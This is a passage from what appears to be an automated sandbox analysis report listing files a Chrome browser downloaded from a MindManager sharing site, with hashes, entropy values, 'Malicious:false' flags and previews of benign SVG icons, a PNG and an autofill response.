                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#727272;}.cls-3{fill:#fff;}</style></defs><title>priority07</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5.22,13,8.76,6a4.35,4.35,0,0,1,.3-.54,2,2,0,0,1,.22-.29L10,5.08V5a2.54,2.54,0,0,1-.65,0H5V3h7V4.7L7.78,13Z"/><path class="cls-3" d="M4.22,12,7.76,5a4.35,4.35,0,0,1,.3-.54,2,2,0,0,1,.22-.29L9,4.08V4a2.54,2.54,0,0,1-.65,0H4V2h7V3.7L6.78,12Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):793
                                                                Entropy (8bit):5.159676776781832
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E359104C698AD6C0A6499C8E4249CFF0
                                                                SHA1:80CBC4B7B3C4F2EE5CE63BE6167C3BF277D82866
                                                                SHA-256:02D53FAC403ED1FD045F3D2F8429CE1EA55711E9B7F4B881167062FAFCD54DAB
                                                                SHA-512:AD8131C2AA15437E6DDC55182046F935B68A73DCA96D62FB1BB808AE14ACA3075D842ED739EC3A084FB33C99BC0FE9A7A93FCE8190F8B3773F9552A17B87FFC5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone07.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}.cls-5{fill:gray;}</style></defs><title>roPercentageDone07</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8,15.5a7.5,7.5,0,0,1-7.48-7h8v-8a7.5,7.5,0,0,1-.5,15Z"/><path class="cls-4" d="M9,1.07A7,7,0,1,1,1.07,9H9V1.07M8,0V8H0A8,8,0,1,0,8,0Z"/><path class="cls-5" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-1" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):104
                                                                Entropy (8bit):4.840199122155243
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:021197253B2562210B461059E9AD2DF3
                                                                SHA1:179ECE63910591822F738E8E999028C969C4A832
                                                                SHA-256:29B65BE90398DCE2A43CFB41EF2A4B0E08FACAE58215B1A03DD454D590B16EC9
                                                                SHA-512:512E85D9FB36BE2C9189A3B575A57CECB73FB3B33839CCBF8D56064872C8CD93BBFE9B371A696AEA3E0C325A64DCBEEA2974BFB751576376D158012F9982CA9C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwl9KEgVI5_1YhIFDV9X_g0SBQ0TmyRjEjMJsHWxpDszbggSBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUN0AJA7BIFDahd43Q=?alt=proto
                                                                Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKNgoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):56379
                                                                Entropy (8bit):4.156347080368438
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9590CCA56B55AC098DCFF191F929027A
                                                                SHA1:9D3EE5CD4546D5835DDF6C6763DE3A0D5B062454
                                                                SHA-256:2E1F2FDC2A49339D48C29F58188A57160F8EAF2848EFB2DF0B33B163EEC53C64
                                                                SHA-512:405F223858788EC8665F12620F6520A6E7E1FF1F4AE0FF30B0F97B584565CE5D2A4DE73E2733604B3F746DCAE8A3AAF90FE1C4B008461ECBB5FF6733F0EB508C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_writing_documentation.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_4720)">..<rect width="200" height="250" rx="10" fill="#FFDAC3"/>..<g clip-path="url(#clip1_456_4720)">..<path d="M179.2 110.803C175.092 91.745 160.673 76.7575 142.836 70.0163C125 63.2752 104.156 64.2919 84.8604 70.6432C59.6934 78.9269 36.0278 97.11 24.6092 121.592C13.1906 146.074 16.2115 176.585 34.809 192.65C43.7466 200.371 56.9489 204.421 68.7137 199.272C80.0522 194.308 87.5903 182.142 98.8661 176.997C119.068 167.779 141.692 182.761 161.197 167.62C176.673 155.606 182.814 127.571 179.2 110.803Z" fill="#F5C2A2"/>..<path d="M122.511 199.32H87.3892C91.2962 195.254 91.9972 190.277 92.0814 185.071C92.086 184.636 92.0905 184.201 92.0905 183.767V177.645H117.809V183.767C117.809 189.445 118.282 194.918 122.511 199.32Z" fill="#F0F7FF"/>..<path d="M117.81 177.645V181.234L92.082 185.071C92.0866 184.636 92.0911 184.202 92.0911 183.767V177.645L117.81 177.645Z" fill="#B8C
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1147
                                                                Entropy (8bit):5.129296160734493
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A6B335CD636A2E9E9FFC41CAE885FD87
                                                                SHA1:FF09299166A6420DBA94B87008F964F1712DB60E
                                                                SHA-256:FA82D5F3941AA555BCC7DECD9C8883E37CC0FC47A1C34B2FCCF123D464BFAB00
                                                                SHA-512:28B5F19C10B8048A00B8A7ED6B46727CEC45293008802697727525048965301332E5D2C70CDCC98FA49B6A899C65768840E115A68EFFB31C6C03CE699511E506
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_add_topic.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#63a558;}.cls-3{fill:#96be7d;stroke:#63a558;}.cls-3,.cls-4{stroke-miterlimit:10;}.cls-4{fill:#ccc;stroke:gray;}</style></defs><title>web app toolbar assets add topic</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="12.5 22.5 12.5 20.5 10.5 20.5 10.5 17.5 12.5 17.5 12.5 15.5 15.5 15.5 15.5 17.5 17.5 17.5 17.5 20.5 15.5 20.5 15.5 22.5 12.5 22.5"/><path class="cls-2" d="M15,16v2h2v2H15v2H13V20H11V18h2V16h2m1-1H12v2H10v4h2v2h4V21h2V17H16V15Z"/><rect class="cls-3" x="4.5" y="14.5" width="19" height="9" rx="4"/><path class="cls-2" d="M5,19H1V5H5V4H1.25C.7,4,0,4.48,0,5V19.12c0,.48.7.88,1.25.88H5Z"/><polygon class="cls-1" points="12.5 22.5 12.5 20.5 10.5 20.5 10.5 17.5 12.5 17.5 12.5 15.5 15.5 15.5 15.5 17.5 17.5 17.5 17.5 20.5 15.5 20.5 15.5 22.5 12.5 22.5"/><path class="cls-2" d="M15,16v2h2v
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):1304
                                                                Entropy (8bit):7.739405023112514
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9F83C13D7151D522C00241F7DB598D44
                                                                SHA1:9D87F6BB99A99311B20E4DFA6B1FA8CFA45919E4
                                                                SHA-256:4FC2111D43CFDEADB56E665BD97EA90E6380E95F32C09B2DCFBDDBA78E8EBFD9
                                                                SHA-512:66515B979981D3438545496397FDE771F31087FB69DF688ECD541DC145DE00A010B2B8F19A477A37536963D36A873CFDF8E2369E63AE5C6D19E198D058748499
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-align-center-disabled.png
                                                                Preview:.PNG........IHDR...0...0.....W.......bKGD..............pHYs.................tIME.......".......IDATh..YMh\U.>..s....*....ZEm3..f&P.....XZ....AP.F..}A..J.....*".$m#.2.Z.I\.D-(..J....w\LSR3/5.f...ow..s......&.....Ts}..Eg...". t.....X.....Z..s..#.....ZH.b..n.ry..g....t.. (f...N......q..".....E...&..Y+.$.!.(...i.....9.....3t..|..~..I@.^.....7=2"f...}/.WZ..).?.P.t.}.- ...t...x!..S.u=.....jy..xc.....3.>*....K.BQ.^)~......|n|j.j....F.7...u.... .....H.v......o4.62.....z......lbz.o|ME...39k.^.Hz\...OW....\......a..p....!.Q....o.....#...C.CJ.S.J.....]....z.y.wv_.j...R.._...Z.|.03.U..^S.....jI...D..HD8._`k.N..=........5o...m...I.".....r..o...5RBD..A.+..L`I...]....."..IQf.Gt.x..O,.....9"<.E.<.:..U z...H.?.7]\.-...w.I..r..I..L.Z'....`..x.u.........m.sn.w~@2.|.V,:..y..{.b..pjf^:....Vo4....6...]"a..H..qBd$:Z..~.z.y...5...\.+O.J=.fmt.}..>...+...%.!.t.ms.i...|a..1..+.C.7..Q...f......Y.D..]..i..].....XGG.T..@DV.x.Y.'.b....[|.q....X%.|....(G..I..{...>..l....&.O
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):826
                                                                Entropy (8bit):5.203881538366898
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F07BC0B156223BCE5FA05696CA76732C
                                                                SHA1:06EF7EFE9DCE9A32CF36388FCFC784CFDFDF9E14
                                                                SHA-256:D07AA24CB334E363FC6AADE7711E6D7BD07A86817EE1FB0464581E8046D8A8A5
                                                                SHA-512:A9E7FFE968DEB0574653A2FF7A2C42EDD9DBA1FFE91D4515C900DD7C9F69D57AAE4B9F46FD7D7D55B7F05291C1871EF01AC6672178BC38E877F21896C4F2344E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_cut.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23.5 23.56"><defs><style>.cls-1{fill:none;stroke-width:1.5px;}.cls-1,.cls-2{stroke:gray;stroke-miterlimit:10;}.cls-2{fill:#c9c9c9;}.cls-3{fill:gray;}</style></defs><title>web app toolbar assets cut</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><circle class="cls-1" cx="4.25" cy="19.31" r="3.5"/><circle class="cls-1" cx="19.25" cy="19.31" r="3.5"/><polygon class="cls-2" points="17.75 1.76 16.75 0.81 12.75 7.47 14.75 11.28 17.75 1.76"/><path class="cls-2" d="M8.75,14.14,5.75,17l2,1.9A3.79,3.79,0,0,1,10,15.51Z"/><path class="cls-2" d="M7.75.81l-1,1L9.56,13.6,11,15.17a3.94,3.94,0,0,1,.77-.08c2.21,0,4.5,4.11,4.5,6.22l.5-4.31Z"/><circle class="cls-3" cx="11.75" cy="12.81" r="1"/></g></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1577
                                                                Entropy (8bit):5.087037006888897
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9FA6D61389E2408A144EDA89D125EEF3
                                                                SHA1:0C1262C88667F81F75D176D78899903D979856EC
                                                                SHA-256:5B076C153983567AF07470F31AE9A79796B29F77D68AFE0DF325ED5F6F5BE9D2
                                                                SHA-512:ECD308266A43E33804FFAD293AA398E52E8AE62A4A19268095E7C2E53463AE26C3185A2EB5284F13C18140AD02A315CACB193B6F2A998980D5ED0D407FC49FD6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_open.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16.01"><defs><style>.cls-1{fill:#c8c7c8;}.cls-2{fill:gray;}.cls-3{fill:#fff;}.cls-4{fill:#4f87c6;}</style></defs><title>context_open</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M1.37,14.51a1,1,0,0,1-.87-1V1.4A.83.83,0,0,1,1.24.5H7C7.4.5,7.89,1,8.5,1.61v1.9h6.13a1,1,0,0,1,.87,1v8.93a1,1,0,0,1-.87,1Z"/><path class="cls-2" d="M7,1c.21,0,.65.42,1,.81V4h6.63c.18,0,.37.23.37.53v8.93c0,.31-.19.54-.37.54H1.37c-.18,0-.37-.23-.37-.54V1.4a.5.5,0,0,1,.11-.33A.19.19,0,0,1,1.25,1H7M7,0H1.24A1.33,1.33,0,0,0,0,1.4V13.47A1.46,1.46,0,0,0,1.37,15H14.63A1.46,1.46,0,0,0,16,13.47V4.54A1.46,1.46,0,0,0,14.63,3H9V1.4C8.24.63,7.65,0,7,0Z"/><rect class="cls-3" x="0.5" y="7.51" width="15" height="8" rx="1.71"/><path class="cls-2" d="M13.79,8A1.21,1.21,0,0,1,15,9.22V13.8A1.21,1.21,0,0,1,13.79,15H2.21A1.21,1.21,0,0,1,1,13.8V9.22A1.21,1.21,0,0,1,2.21,8H13.79m0-1H2.21A2.21,2.21,0,0,0,0,9.22V13.8A2.21,2.
                                                                No static file info